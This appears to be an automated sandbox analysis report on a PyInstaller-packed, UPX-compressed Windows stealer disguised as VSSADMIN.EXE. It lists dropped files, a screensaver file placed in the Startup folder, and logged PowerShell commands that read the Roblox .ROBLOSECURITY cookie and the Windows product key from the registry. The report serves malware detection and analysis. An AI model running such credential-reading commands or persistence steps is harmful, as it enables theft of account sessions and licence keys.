              Source: VSSADMIN.EXE.exe, 00000001.00000002.246056631.00007FFD43FF1000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
              Source: VSSADMIN.EXE.exe, 00000001.00000002.246056631.00007FFD43FF1000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
              Source: VSSADMIN.EXE.exe, 00000001.00000002.246056631.00007FFD43FF1000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
              Source: VSSADMIN.EXE.exe, 00000001.00000002.246056631.00007FFD43FF1000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
              Source: VSSADMIN.EXE.exe, 00000001.00000002.246056631.00007FFD43FF1000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
              Source: VSSADMIN.EXE.exe, 00000001.00000002.246056631.00007FFD43FF1000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\3597805b7d7dce423abb491985dd28e8\mscorlib.ni.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\3597805b7d7dce423abb491985dd28e8\mscorlib.ni.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\3597805b7d7dce423abb491985dd28e8\mscorlib.ni.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\3597805b7d7dce423abb491985dd28e8\mscorlib.ni.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\3597805b7d7dce423abb491985dd28e8\mscorlib.ni.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\3597805b7d7dce423abb491985dd28e8\mscorlib.ni.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\3597805b7d7dce423abb491985dd28e8\mscorlib.ni.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\3597805b7d7dce423abb491985dd28e8\mscorlib.ni.dll
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6568:120:WilError_01
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4772:120:WilError_01
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6908:120:WilError_01
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6676:120:WilError_01
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5388:120:WilError_01
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5248:120:WilError_01
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6400:120:WilError_01
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7032:120:WilError_01
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6960:120:WilError_01
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6328:120:WilError_01
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6344:120:WilError_01
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5368:120:WilError_01
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6928:120:WilError_01
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6916:120:WilError_01
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1008:120:WilError_01
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6532:120:WilError_01
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3000:120:WilError_01
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5216:120:WilError_01
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeMutant created: \Sessions\1\BaseNamedObjects\5
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4828:120:WilError_01
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6476:120:WilError_01
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6556:120:WilError_01
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5228:120:WilError_01
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6352:120:WilError_01
              Source: VSSADMIN.EXE.exeString found in binary or memory: set-addPolicy
              Source: VSSADMIN.EXE.exeString found in binary or memory: id-cmc-addExtensions
              Source: VSSADMIN.EXE.exeString found in binary or memory: can't send non-None value to a just-started generator
              Source: VSSADMIN.EXE.exeString found in binary or memory: --help
              Source: VSSADMIN.EXE.exeString found in binary or memory: --help
              Source: VSSADMIN.EXE.exeString found in binary or memory: command-line parameters (see --help for details): PYTHONDEBUG : enable parser debug mode (-d) PYTHONDONTWRITEBYTECODE : don't write .pyc files (-B) PYTHONINSPECT : inspect interactively after running script (-i) PYTHONINTMAXSTRDIGITS :
              Source: VSSADMIN.EXE.exeString found in binary or memory: command-line parameters (see --help for details): PYTHONDEBUG : enable parser debug mode (-d) PYTHONDONTWRITEBYTECODE : don't write .pyc files (-B) PYTHONINSPECT : inspect interactively after running script (-i) PYTHONINTMAXSTRDIGITS :
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: VSSADMIN.EXE.exeStatic PE information: Image base 0x140000000 > 0x60000000
              Source: VSSADMIN.EXE.exeStatic file information: File size 7380816 > 1048576
              Source: VSSADMIN.EXE.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
              Source: VSSADMIN.EXE.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
              Source: VSSADMIN.EXE.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
              Source: VSSADMIN.EXE.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: VSSADMIN.EXE.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
              Source: VSSADMIN.EXE.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
              Source: VSSADMIN.EXE.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
              Source: VSSADMIN.EXE.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: VSSADMIN.EXE.exe, 00000001.00000002.245837300.00007FFD43EF0000.00000040.00000001.01000000.00000013.sdmp
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_A source: VSSADMIN.EXE.exe
              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ozweafg0\ozweafg0.pdb source: powershell.exe, 00000025.00000002.213633316.000001FB93A2A000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\libssl-1_1.pdb@@ source: VSSADMIN.EXE.exe, 00000001.00000002.245935470.00007FFD43F76000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: VSSADMIN.EXE.exe, 00000001.00000002.245453028.00007FFD3FE3F000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1u 30 May 2023built on: Wed May 31 23:27:41 2023 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: VSSADMIN.EXE.exe, 00000001.00000002.245453028.00007FFD3FE3F000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: VSSADMIN.EXE.exe, 00000000.00000003.187735351.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.246585404.00007FFD59301000.00000002.00000001.01000000.00000005.sdmp
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: VSSADMIN.EXE.exe, 00000000.00000003.187735351.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.246585404.00007FFD59301000.00000002.00000001.01000000.00000005.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: VSSADMIN.EXE.exe, 00000001.00000002.246056631.00007FFD43FF1000.00000040.00000001.01000000.0000000B.sdmp
              Source: Binary string: 0.pdb(kD . source: powershell.exe, 00000025.00000002.224011476.000001FBAB192000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\libcrypto-1_1.pdb source: VSSADMIN.EXE.exe, VSSADMIN.EXE.exe, 00000001.00000002.245453028.00007FFD3FEC1000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmp, rar.exe, 0000003B.00000000.226038634.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\python311.pdb source: VSSADMIN.EXE.exe, 00000001.00000002.245659423.00007FFD402EB000.00000040.00000001.01000000.00000004.sdmp
              Source: Binary string: D:\a\1\b\libssl-1_1.pdb source: VSSADMIN.EXE.exe, VSSADMIN.EXE.exe, 00000001.00000002.245935470.00007FFD43F76000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: VSSADMIN.EXE.exe, 00000001.00000002.246494699.00007FFD592D1000.00000040.00000001.01000000.0000000D.sdmp
              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ozweafg0\ozweafg0.pdbhP source: powershell.exe, 00000025.00000002.213633316.000001FB93A2A000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: VSSADMIN.EXE.exe, 00000001.00000002.246395707.00007FFD59241000.00000040.00000001.01000000.00000006.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: VSSADMIN.EXE.exe, 00000001.00000002.246442794.00007FFD59271000.00000040.00000001.01000000.00000011.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: VSSADMIN.EXE.exe, 00000001.00000002.246221693.00007FFD5269C000.00000040.00000001.01000000.00000008.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: VSSADMIN.EXE.exe, 00000001.00000002.246354219.00007FFD55601000.00000040.00000001.01000000.00000012.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: VSSADMIN.EXE.exe, 00000001.00000002.246221693.00007FFD5269C000.00000040.00000001.01000000.00000008.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: VSSADMIN.EXE.exe, 00000001.00000002.246310845.00007FFD52DF1000.00000040.00000001.01000000.00000009.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: VSSADMIN.EXE.exe, 00000001.00000002.246171168.00007FFD507E1000.00000040.00000001.01000000.0000000C.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: VSSADMIN.EXE.exe, 00000001.00000002.246126564.00007FFD449E1000.00000040.00000001.01000000.0000000A.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: VSSADMIN.EXE.exe, VSSADMIN.EXE.exe, 00000001.00000002.246012635.00007FFD43FC1000.00000040.00000001.01000000.0000000E.sdmp
              Source: VSSADMIN.EXE.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: VSSADMIN.EXE.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: VSSADMIN.EXE.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: VSSADMIN.EXE.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: VSSADMIN.EXE.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

              Data Obfuscation

              barindex
              Suspicious powershell command line found
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFCDFBE840D push cs; iretd 8_2_00007FFCDFBE8412
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFCDFBE0B45 push ds; iretd 8_2_00007FFCDFBE0B5A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFCDFBE81B8 push ebx; ret 8_2_00007FFCDFBE81DA
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFCDFBE00BD pushad ; iretd 8_2_00007FFCDFBE00C1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFCDFCB6014 pushad ; retf 8_2_00007FFCDFCB601A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFCDFCB6004 pushad ; retf 8_2_00007FFCDFCB6012
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFCDFCB63A1 push C0000063h; ret 8_2_00007FFCDFCB63C1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFCDFCB5349 push ebp; retf 8_2_00007FFCDFCB534A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFCDFCB533F push ebx; retf 8_2_00007FFCDFCB5342
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFCDFCB06A5 push es; retf 8_2_00007FFCDFCB06F2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFCDFCB6243 push C0000063h; ret 8_2_00007FFCDFCB63C1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFCDFCB5613 push esi; retf 8_2_00007FFCDFCB5632
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFCDFCB5634 push edi; retf 8_2_00007FFCDFCB563A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFCDFCB4DC3 push eax; retf 8_2_00007FFCDFCB4DDA
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFCDFCB15DD push ss; retf 8_2_00007FFCDFCB1632
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFCDFCB4D88 push C000004Dh; ret 8_2_00007FFCDFCB4DC1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFCDFCB0554 push es; retf 8_2_00007FFCDFCB055A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFCDFCB5144 push ebx; retf 8_2_00007FFCDFCB514A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFCDFCB5134 push ecx; retf 8_2_00007FFCDFCB5142
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFCDFCB9934 pushfd ; retf 8_2_00007FFCDFCB994A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFCDFCB9CB1 pushfd ; retf 8_2_00007FFCDFCB9CB2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 37_2_00007FFCDFBE00BD pushad ; iretd 37_2_00007FFCDFBE00C1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 37_2_00007FFCDFCB15B9 push ss; retf 37_2_00007FFCDFCB15BA
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 1_2_00007FFD3FF45510 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,1_2_00007FFD3FF45510
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ozweafg0\ozweafg0.cmdline
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ozweafg0\ozweafg0.cmdline
              Source: VSSADMIN.EXE.exeStatic PE information: section name: _RDATA
              Source: libffi-8.dll.0.drStatic PE information: section name: UPX2
              Source: VCRUNTIME140.dll.0.drStatic PE information: section name: _RDATA
              Source: ???.scr.1.drStatic PE information: section name: _RDATA
              Source: libcrypto-1_1.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x124d75
              Source: ozweafg0.dll.44.drStatic PE information: real checksum: 0x0 should be: 0x2308
              Source: VSSADMIN.EXE.exeStatic PE information: real checksum: 0x70c090 should be: 0x716ffa
              Source: unicodedata.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x4a227
              Source: _ctypes.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x19e1b
              Source: _bz2.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x1784a
              Source: libffi-8.dll.0.drStatic PE information: real checksum: 0x0 should be: 0xa1d1
              Source: _ssl.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x17418
              Source: sqlite3.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x9ff17
              Source: libssl-1_1.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x349c6
              Source: _queue.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0xc985
              Source: _socket.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x15415
              Source: ???.scr.1.drStatic PE information: real checksum: 0x70c090 should be: 0x716ffa
              Source: python311.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x1a7f3d
              Source: _decimal.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x1f8c8
              Source: _hashlib.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0xa12c
              Source: select.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x12345
              Source: _lzma.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x23dc5
              Source: _sqlite3.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x1deb7
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1

              Persistence and Installation Behavior

              barindex
              Uses cmd line tools excessively to alter registry or file data
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
              Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
              Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
              Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
              Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
              Drops PE files with a suspicious file extension
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ???.scrJump to dropped file
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ???.scrJump to dropped file
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI68562\libffi-8.dllJump to dropped file
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI68562\select.pydJump to dropped file
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI68562\libssl-1_1.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\ozweafg0\ozweafg0.dllJump to dropped file
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI68562\rar.exeJump to dropped file
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI68562\_bz2.pydJump to dropped file
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI68562\libcrypto-1_1.dllJump to dropped file
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI68562\unicodedata.pydJump to dropped file
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI68562\sqlite3.dllJump to dropped file
